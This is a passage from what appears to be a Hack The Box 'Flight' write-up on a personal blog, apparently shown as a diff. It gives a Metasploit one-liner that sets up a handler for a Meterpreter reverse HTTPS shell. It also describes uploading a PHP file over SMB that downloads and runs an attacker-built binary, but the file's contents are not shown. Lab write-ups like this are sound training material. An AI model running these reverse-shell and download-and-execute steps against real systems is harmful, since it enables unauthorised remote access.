duskb1t/duskb1t.github.io/_posts/flight/2024-05-08-htb-flight.md

 msfconsole -q -x "use multi/handler; set payload windows/meterpreter/reverse_https; set lhost tun0; set lport 443; run"
 ```

 Next step is to upload the following file over SMB and execute it via URL.
+It will download the the binary that we created and execute it, which is why I called it 'primer.php' (reference to DNA replication XD).

 ```bash
 cat primer.php